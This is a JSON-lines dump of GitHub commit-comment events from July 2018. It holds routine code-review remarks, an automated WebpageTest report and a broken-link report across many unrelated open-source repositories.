{"id":"7995274875","type":"CommitCommentEvent","actor":{"login":"JCofman"},"repo":{"name":"JCofman/jc-website"},"payload":{"comment":{"id":29780006,"position":null,"line":null,"path":null,"commit_id":"c9092ef938ae2e608b135b54241ef210589376a0","created_at":"2018-07-20T14:15:53Z","updated_at":"2018-07-20T14:15:53Z","author_association":"OWNER","body":"\n# WebpageTest report\n* run id: 180720_TX_31a3c858ab1f484c375b60bae1a7fdc1\n* URL testid: https://jcofman-vjhozpfxwg.now.sh\n* Summary of the test: http://www.webpagetest.org/results.php?test=180720_TX_31a3c858ab1f484c375b60bae1a7fdc1\n* location where the test has run: Dulles:Chrome\n* from run parameter: Dulles, VA - <b>Chrome</b> - <b>Cable</b>\n* connectivity: Cable\n* runs: [object Object], successFullRuns: 0\n\n## Report\n### FirstView\n| File | FileSize | \n|----------|----------|\n /|NaN undefined \r\n\n\n# VisualMetrics\n## Metrics Median\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 0 | 0 | 0 | 0 | 1191 |  \nRepeatView | 0 | 0 | 0 | 0 | 1153 |  \n\n  ## Metrics Average\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | undefined | undefined | undefined | undefined | undefined |  \nRepeatView | undefined | undefined | undefined | undefined | undefined |  \n\n\n# Waterfall\n\n## FirstView median\n![alt text](http://www.webpagetest.org/results/18/07/20/TX/31a3c858ab1f484c375b60bae1a7fdc1/1_waterfall.png)\n\n\n# FilmStrip\n## FirstView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_TX_31a3c858ab1f484c375b60bae1a7fdc1&video=video_1&file=ms_000000.jpg)|\n| 100|\n    \n        \n\n## ReapeatView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_TX_31a3c858ab1f484c375b60bae1a7fdc1&video=video_1_cached&file=ms_000000.jpg)|\n| 100|\n    \n    "}},"created_at":"2018-07-20T14:15:53Z"}
{"id":"7995275884","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-api"},"payload":{"comment":{"id":29780009,"position":24,"line":null,"path":"manager/fleetManager.go","commit_id":"14a0d2f0bd5d66c0c483af9b285d381d9e982982","created_at":"2018-07-20T14:16:03Z","updated_at":"2018-07-20T14:16:03Z","author_association":"CONTRIBUTOR","body":"Pas besoin de cette colonne. Si FleetId n'est pas nil alors le vaisseau est dans une flotte "}},"created_at":"2018-07-20T14:16:03Z"}
{"id":"7995278225","type":"CommitCommentEvent","actor":{"login":"Alf21"},"repo":{"name":"dsdude123/TTT2"},"payload":{"comment":{"id":29780013,"position":null,"line":null,"path":null,"commit_id":"268773bdebe86ca1367f6c3c38b331e0cddb4d35","created_at":"2018-07-20T14:16:29Z","updated_at":"2018-07-20T14:16:29Z","author_association":"NONE","body":"I'm sorry, but I can't implement these changes into the main branch. But we can think about a ConVar or something that could be adjusted in-game to toggle some modes or creating a ConVar focused on the randomness of custom / special new roles?"}},"created_at":"2018-07-20T14:16:29Z"}
{"id":"7995280098","type":"CommitCommentEvent","actor":{"login":"andysim"},"repo":{"name":"psi4/psi4"},"payload":{"comment":{"id":29780015,"position":4,"line":51,"path":"doc/sphinxman/source/dftd3.rst","commit_id":"cbcb1554cb029a9f13618ec4cc8ebda3813df57b","created_at":"2018-07-20T14:16:49Z","updated_at":"2018-07-20T14:16:49Z","author_association":"MEMBER","body":"Noted for future.  Sorry about that"}},"created_at":"2018-07-20T14:16:49Z"}
{"id":"7995280716","type":"CommitCommentEvent","actor":{"login":"jsfan3"},"repo":{"name":"codenameone/CodenameOne"},"payload":{"comment":{"id":29780019,"position":null,"line":null,"path":null,"commit_id":"86fea99196dd5a453988ede8217e0809e529469a","created_at":"2018-07-20T14:16:56Z","updated_at":"2018-07-20T14:16:56Z","author_association":"CONTRIBUTOR","body":"Interesting idea. Thank you!"}},"created_at":"2018-07-20T14:16:56Z"}
{"id":"7995287312","type":"CommitCommentEvent","actor":{"login":"pratikshasingh1"},"repo":{"name":"pratikshasingh1/100-Dayscode-c-lan"},"payload":{"comment":{"id":29780062,"position":null,"line":null,"path":null,"commit_id":"5898e35978a26cf56c0d5880856f9669d44274c9","created_at":"2018-07-20T14:18:06Z","updated_at":"2018-07-20T14:18:06Z","author_association":"OWNER","body":"day 9\r\n"}},"created_at":"2018-07-20T14:18:06Z"}
{"id":"7995289264","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780095,"position":1,"line":1,"path":"stand/efi/loader/multiboot2.h","commit_id":"8cbbd765b994fd308f25fc507de306f1a9111dfe","created_at":"2018-07-20T14:18:27Z","updated_at":"2018-07-20T14:18:27Z","author_association":"NONE","body":"Please make sure you address _all_ comments before requesting new reviews. I've told you here:\r\n\r\nhttps://github.com/kristapuciitis/freebsd/commit/6802c7fd1f0a9094ac887eba83023779a6c3c12a#r29346861\r\n\r\nThat this was not OK, yet that comment seems to be completely ignored and the code has not changed at all.\r\n\r\nEither reply to the comment with your arguments so that we can come to an agreement or fix the code as requested."}},"created_at":"2018-07-20T14:18:27Z"}
{"id":"7995289661","type":"CommitCommentEvent","actor":{"login":"zh-m"},"repo":{"name":"comrade-coop/wetonomy"},"payload":{"comment":{"id":29780103,"position":27,"line":27,"path":"apps/members/app/src/components/MembersTable/index.jsx","commit_id":"f955fe04ee2989ab9ae158ee1ff5f3e0af242d5d","created_at":"2018-07-20T14:18:31Z","updated_at":"2018-07-20T14:18:31Z","author_association":"COLLABORATOR","body":"Is that space needed?"}},"created_at":"2018-07-20T14:18:31Z"}
{"id":"7995292607","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29780108,"position":null,"line":null,"path":null,"commit_id":"d307463534e08af51f0274714257a3b7ff001148","created_at":"2018-07-20T14:19:02Z","updated_at":"2018-07-20T14:19:02Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Listar Informações para o Produtor](https://trello.com/c/IXEScKgB/223-listar-informa%C3%A7%C3%B5es-para-o-produtor)"}},"created_at":"2018-07-20T14:19:02Z"}
{"id":"7995293059","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29780111,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T14:19:07Z","updated_at":"2018-07-20T14:19:07Z","author_association":"OWNER","body":"However the other version(solely favoring depth) failed, so I guess there is some metric of higher scores are better even if its from lower depth."}},"created_at":"2018-07-20T14:19:07Z"}
{"id":"7995293975","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29780114,"position":null,"line":null,"path":null,"commit_id":"789c0d456a78f81ba5cdfc31427bc043e9e60535","created_at":"2018-07-20T14:19:16Z","updated_at":"2018-07-20T14:19:16Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Listar Informações para o Produtor](https://trello.com/c/IXEScKgB/223-listar-informa%C3%A7%C3%B5es-para-o-produtor)"}},"created_at":"2018-07-20T14:19:16Z"}
{"id":"7995295243","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29780115,"position":null,"line":null,"path":null,"commit_id":"2bed4e2c1a520e2f53ae730254f241007fe4543d","created_at":"2018-07-20T14:19:30Z","updated_at":"2018-07-20T14:19:30Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Listar Informações para o Produtor](https://trello.com/c/IXEScKgB/223-listar-informa%C3%A7%C3%B5es-para-o-produtor)"}},"created_at":"2018-07-20T14:19:30Z"}
{"id":"7995296801","type":"CommitCommentEvent","actor":{"login":"wortiz"},"repo":{"name":"goma/goma"},"payload":{"comment":{"id":29780118,"position":21,"line":1270,"path":"src/mm_fill_aux.c","commit_id":"9ab96b543f55e41ceced7bbf5ae31bd63bb971c8","created_at":"2018-07-20T14:19:47Z","updated_at":"2018-07-20T14:19:47Z","author_association":"CONTRIBUTOR","body":"This will break for a 1D problem now right? If anyone does those in goma.\r\n\r\nMaybe it would be better to make your size work for 1D and 2D or do the check for 1D here and keep the old behavior\r\n"}},"created_at":"2018-07-20T14:19:47Z"}
{"id":"7995300846","type":"CommitCommentEvent","actor":{"login":"katebedford"},"repo":{"name":"katebedford/katebedford.github.io"},"payload":{"comment":{"id":29780125,"position":1,"line":1,"path":"README.md","commit_id":"15d08b3580eb3cb9d9a2915b9a3ccce000acfbdd","created_at":"2018-07-20T14:20:30Z","updated_at":"2018-07-20T14:20:30Z","author_association":"OWNER","body":"index.html"}},"created_at":"2018-07-20T14:20:30Z"}
{"id":"7995304265","type":"CommitCommentEvent","actor":{"login":"Dasc3er"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29780133,"position":null,"line":null,"path":null,"commit_id":"8996dadc2479392ea801f07618b0e0b5262e4f58","created_at":"2018-07-20T14:21:08Z","updated_at":"2018-07-20T14:21:08Z","author_association":"CONTRIBUTOR","body":"@loviuz E' meglio evitare l'utilizzo degli short tags PHP...\r\nFix con il commit 81b7364."}},"created_at":"2018-07-20T14:21:08Z"}
{"id":"7995304332","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29780134,"position":19,"line":65,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-20T14:21:09Z","updated_at":"2018-07-20T14:21:09Z","author_association":"NONE","body":"I don't think this change should be in this commit - it's just for the auto-complete piece."}},"created_at":"2018-07-20T14:21:09Z"}
{"id":"7995306940","type":"CommitCommentEvent","actor":{"login":"xdd1996"},"repo":{"name":"HcashOrg/hcd"},"payload":{"comment":{"id":29780142,"position":null,"line":null,"path":null,"commit_id":"ea35736dc9a593e2d24bcacf32e69b38ee36fdb7","created_at":"2018-07-20T14:21:37Z","updated_at":"2018-07-20T14:21:37Z","author_association":"NONE","body":".fighting!"}},"created_at":"2018-07-20T14:21:37Z"}
{"id":"7995308038","type":"CommitCommentEvent","actor":{"login":"matthiask"},"repo":{"name":"daenub/react-native-qrcode-scanner"},"payload":{"comment":{"id":29780143,"position":null,"line":null,"path":null,"commit_id":"326803ca247e328abad6c5d221dbeff20d853bbe","created_at":"2018-07-20T14:21:48Z","updated_at":"2018-07-20T14:21:48Z","author_association":"NONE","body":"Cool!"}},"created_at":"2018-07-20T14:21:48Z"}
{"id":"7995309109","type":"CommitCommentEvent","actor":{"login":"xdd1996"},"repo":{"name":"HcashOrg/hcd"},"payload":{"comment":{"id":29780146,"position":null,"line":null,"path":null,"commit_id":"ea35736dc9a593e2d24bcacf32e69b38ee36fdb7","created_at":"2018-07-20T14:21:58Z","updated_at":"2018-07-20T14:21:58Z","author_association":"NONE","body":"fighting!"}},"created_at":"2018-07-20T14:21:58Z"}
{"id":"7995312257","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29780150,"position":null,"line":null,"path":null,"commit_id":"64644281ba2eb8905f40920c1b1075e1b866160c","created_at":"2018-07-20T14:22:31Z","updated_at":"2018-07-20T14:22:31Z","author_association":"NONE","body":"Comment on 64644281ba2eb8905f40920c1b1075e1b866160c.\n\nThere are 64 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to https://coala.io/chat | _faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to https://coala.io/cep5 | _projects/implement_aspects.md | 107 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 50 |\n| Broken link - unable to connect to https://coala.io/newcomer | _faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io/usability | _faq/gsoc_requirements.md | 7 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 59 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 50 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/improve_diff_handling.md | 152 |\n| Broken link - unable to connect to https://coala.io | reports/example.md | 8 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 19 |\n| Broken link - unable to connect to https://coala.io/#/coalaonline | reports/hemang.md | 207 |\n| Broken link - unable to connect to https://coala.io/rebase | PULL_REQUEST_TEMPLATE.md | 25 |\n| Broken link - unable to connect to https://coala.io/review | PULL_REQUEST_TEMPLATE.md | 30 |\n| Broken link - unable to connect to https://coala.io/reviewing | PULL_REQUEST_TEMPLATE.md | 31 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 20 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 18 |\n| Broken link - unable to connect to https://coala.io/newcomer | data/locale/en/faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/adhikasp.md | 6 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/id/faq/contact_mentor.md | 1 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://coala.io/chat | partials/tabs/mentors.html | 10 |\n| Broken link - unable to connect to https://coala.io/chat | partials/tabs/mentors.html | 48 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 18 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 251 |\n| Broken link - unable to connect to https://projects.coala.io | data/locale/en/README.md | 9 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://docs.google.com/document/d/10FHYhRzK9IxroDoPxI5V_nWCR3DO-g-C-g12B0WKkQA/edit?usp=sharing | data/locale/en/projects/coala_cli.md | 152 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 6 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 19 |\n| Broken link - unable to connect to https://gitmate.io/ | data/locale/en/projects/gitmate_plugins.md | 31 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/improve_diff_handling.md | 152 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 52 |\n| Broken link - unable to connect to https://fonts.googleapis.com/css?family=Roboto+Mono:300,300i,400,400i,700,700i | index.html | 27 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 52 |\n| Broken link - unable to connect to http://write.flossmanuals.net/gsocstudentguide/what-is-google-summer-of-code/ | _faq/writing_a_great_proposal.md | 28 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | data/locale/en/projects/use_coala.md | 45 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 59 |\n| Broken link - unable to connect to https://query.wikidata.org/ | _projects/git_task_list.md | 88 |\n| Broken link - unable to connect to https://projects.coala.io | README.md | 9 |\n| Broken link - unable to connect to https://jekyllrb.com/docs/troubleshooting/ | README.md | 46 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to http://projects.coala.io/#/mentors | data/locale/en/faq/mentor_obligations.md | 25 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/HC/builds/178769602 | _projects/use_coala.md | 324 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-20T14:22:31Z"}
{"id":"7995314995","type":"CommitCommentEvent","actor":{"login":"basecode"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29780158,"position":5,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"2b761e525328d9402ba8ff0b310e91043a0d6db8","created_at":"2018-07-20T14:23:02Z","updated_at":"2018-07-20T14:23:02Z","author_association":"NONE","body":"> Do you use 20.24.3?\r\n\r\nyes and waiting for 20.24.4 :)\r\n\r\n> I have added additional test case :)\r\n\r\ngreat!"}},"created_at":"2018-07-20T14:23:02Z"}
{"id":"7995315486","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29780160,"position":31,"line":77,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-20T14:23:07Z","updated_at":"2018-07-20T14:23:07Z","author_association":"NONE","body":"You don't need to check `editor.somethingSelected() isn't true`, you can just check `editor.somethingSelected()` and reverse the if/else sections.  I'd prefer avoiding using `null` here as well, maybe check in the `setCodeUsage()` method and avoid this entirely?"}},"created_at":"2018-07-20T14:23:07Z"}
{"id":"7995317171","type":"CommitCommentEvent","actor":{"login":"sheldonhull"},"repo":{"name":"dfinke/NameIT"},"payload":{"comment":{"id":29780164,"position":null,"line":null,"path":null,"commit_id":"83f3ef73a5df6ec71d6a77c4e0ca794ae655547f","created_at":"2018-07-20T14:23:25Z","updated_at":"2018-07-20T14:23:25Z","author_association":"NONE","body":"You are awesome! Thanks for this. Is project still up for pull requests if I add something?"}},"created_at":"2018-07-20T14:23:25Z"}
{"id":"7995318517","type":"CommitCommentEvent","actor":{"login":"pavel64-sutyrin"},"repo":{"name":"pavel64-sutyrin/startc"},"payload":{"comment":{"id":29780170,"position":1,"line":1,"path":"hello.c","commit_id":"ee4327496e8683c9e3782036616e6221ea6af9c4","created_at":"2018-07-20T14:23:39Z","updated_at":"2018-07-20T14:23:39Z","author_association":"OWNER","body":"зачем здесь эта строка?"}},"created_at":"2018-07-20T14:23:39Z"}
{"id":"7995323350","type":"CommitCommentEvent","actor":{"login":"kuba97531"},"repo":{"name":"featurecat/lizzie"},"payload":{"comment":{"id":29780183,"position":44,"line":452,"path":"src/main/java/featurecat/lizzie/analysis/Leelaz.java","commit_id":"20611dbfdd3349204bfc14792544b62f95d97b26","created_at":"2018-07-20T14:24:27Z","updated_at":"2018-07-20T14:24:27Z","author_association":"NONE","body":"I will make it configurable. But I don't know how to hide it. The pondering string is already overlapping with the board.\r\n![test](https://user-images.githubusercontent.com/133693/43007680-588e3552-8c39-11e8-9e96-55ea19af77f1.png)\r\n"}},"created_at":"2018-07-20T14:24:27Z"}
{"id":"7995323838","type":"CommitCommentEvent","actor":{"login":"serdzik"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":29780186,"position":5,"line":190,"path":"LICENSE","commit_id":"4800b9dbcbf871278b276e8bb3e862b98e30a7ba","created_at":"2018-07-20T14:24:32Z","updated_at":"2018-07-20T14:24:32Z","author_association":"NONE","body":"Yo "}},"created_at":"2018-07-20T14:24:32Z"}
{"id":"7995352658","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780261,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:29:38Z","updated_at":"2018-07-20T14:29:38Z","author_association":"NONE","body":"This is because: https://github.com/JOML-CI/JOML/wiki/Anti-Patterns-and-Best-Practices#use-direct-nio-buffers"}},"created_at":"2018-07-20T14:29:38Z"}
{"id":"7995355206","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29780267,"position":5,"line":5,"path":"vowels.rb","commit_id":"d6ffa14c0483ef97e404dbb73a1131bf55188946","created_at":"2018-07-20T14:30:05Z","updated_at":"2018-07-20T14:30:05Z","author_association":"NONE","body":"```\r\nalphabet = ('a' .. 'z')\r\nalphabet = alphabet.to_a\r\n```\r\n\r\nпишется в одну строку\r\n```\r\nalphabet = ('a' .. 'z').to_a\r\n```\r\n"}},"created_at":"2018-07-20T14:30:05Z"}
{"id":"7995355340","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780268,"position":159,"line":191,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:30:07Z","updated_at":"2018-07-20T14:30:07Z","author_association":"NONE","body":"`cancel` is still not fixed IMO"}},"created_at":"2018-07-20T14:30:07Z"}
{"id":"7995358329","type":"CommitCommentEvent","actor":{"login":"bingles"},"repo":{"name":"StatEngine/stat-engine"},"payload":{"comment":{"id":29780273,"position":16,"line":5,"path":"client/components/weather/current-weather.component.html","commit_id":"b2118f39297de66a00db27826637c1e0e9a87829","created_at":"2018-07-20T14:30:36Z","updated_at":"2018-07-20T14:30:36Z","author_association":"MEMBER","body":"@chopchop505 Not sure why it can't read the AwarnessSummary but I'm sure its something simple."}},"created_at":"2018-07-20T14:30:36Z"}
{"id":"7995359372","type":"CommitCommentEvent","actor":{"login":"kormotodor"},"repo":{"name":"prometheus/node_exporter"},"payload":{"comment":{"id":29780276,"position":null,"line":null,"path":null,"commit_id":"ee1e1997bcd04c4a2b23380204a92029a85c6e56","created_at":"2018-07-20T14:30:46Z","updated_at":"2018-07-20T14:30:46Z","author_association":"NONE","body":"It does not working with scsi typo when it under \"Adaptec\" controller."}},"created_at":"2018-07-20T14:30:46Z"}
{"id":"7995359604","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780278,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:30:49Z","updated_at":"2018-07-20T14:30:49Z","author_association":"NONE","body":"Effectively, you are creating a Java-array-backed FloatBuffer with FloatBuffer.allocate(). This _will also NOT work with LWJGL_. You must use a direct NIO buffer, for example via FloatBuffer.allocateDirect()."}},"created_at":"2018-07-20T14:30:49Z"}
{"id":"7995362006","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29780285,"position":null,"line":null,"path":null,"commit_id":"e5b4e21286aab3ead3638248473aa701a54be9de","created_at":"2018-07-20T14:31:14Z","updated_at":"2018-07-20T14:31:14Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/114"}},"created_at":"2018-07-20T14:31:14Z"}
{"id":"7995363775","type":"CommitCommentEvent","actor":{"login":"Thomas101"},"repo":{"name":"wavebox/waveboxapp"},"payload":{"comment":{"id":29780288,"position":null,"line":null,"path":null,"commit_id":"4bbe75f8ca1f60001dd3eb94127651283b5ade48","created_at":"2018-07-20T14:31:33Z","updated_at":"2018-07-20T14:31:33Z","author_association":"MEMBER","body":"Thanks, https://github.com/wavebox/waveboxapp/commit/1d3086cb4fc74067cc98d64c242241b876cfc605 should fix this"}},"created_at":"2018-07-20T14:31:33Z"}
{"id":"7995364272","type":"CommitCommentEvent","actor":{"login":"raresica1234"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780290,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:31:38Z","updated_at":"2018-07-20T14:31:38Z","author_association":"COLLABORATOR","body":"Turns out, we forgot to include the JNI definitions for the Unsafe class, it fails at Unsafe.putInt() because of it."}},"created_at":"2018-07-20T14:31:38Z"}
{"id":"7995364726","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":29780293,"position":null,"line":null,"path":null,"commit_id":"b8e8f9af78f4ef3e556dd3cef6bfee35ad4cb82a","created_at":"2018-07-20T14:31:42Z","updated_at":"2018-07-20T14:31:42Z","author_association":"NONE","body":"I don’t think any of those tests actually test the change. A better test would be something that would have an equivalent `toString()` output. For example:\r\n\r\n```js\r\nexpect(equals(/abc/.toString(), /abc/)).toBe(false);\r\n```\r\n"}},"created_at":"2018-07-20T14:31:42Z"}
{"id":"7995365803","type":"CommitCommentEvent","actor":{"login":"raresica1234"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780296,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:31:54Z","updated_at":"2018-07-20T14:31:54Z","author_association":"COLLABORATOR","body":"Thanks for your help though."}},"created_at":"2018-07-20T14:31:54Z"}
{"id":"7995368832","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780301,"position":126,"line":170,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:32:26Z","updated_at":"2018-07-20T14:32:26Z","author_association":"NONE","body":"You know that an omitted `plaintextMoveInvitee` will convert to `ROCK`."}},"created_at":"2018-07-20T14:32:26Z"}
{"id":"7995370149","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780309,"position":4,"line":2151,"path":"_studio/shared/src/cm_mem_copy.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-20T14:32:40Z","updated_at":"2018-07-20T14:32:40Z","author_association":"NONE","body":"apply a fix from next commit here. should be #ifdef"}},"created_at":"2018-07-20T14:32:40Z"}
{"id":"7995370194","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780310,"position":5,"line":57,"path":"src/actions/actions.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:32:40Z","updated_at":"2018-07-20T14:32:40Z","author_association":"COLLABORATOR","body":"We can handle the tab changing in Redux or local component state.  I try to keep larger changes like this (changing the active page or what component is rendered in Redux and smaller things like form changes or checkboxes in local state."}},"created_at":"2018-07-20T14:32:40Z"}
{"id":"7995371765","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780313,"position":null,"line":null,"path":null,"commit_id":"b64705fcf6a2570a0074c5c962507206084992e4","created_at":"2018-07-20T14:32:57Z","updated_at":"2018-07-20T14:32:57Z","author_association":"NONE","body":"While it's fine to print tag information for development purposes, AFAICT the only relevant tag that you parse is MULTIBOOT2_HEADER_TAG_ENTRY_ADDRESS_EFI64, the other tags are just parsed for printing information, but are not useful to the boot process.\r\n\r\nAlso, in the case of MULTIBOOT2_HEADER_TAG_INFORMATION_REQUEST, don't you need to store somewhere what information you need to provide to the kernel image?"}},"created_at":"2018-07-20T14:32:57Z"}
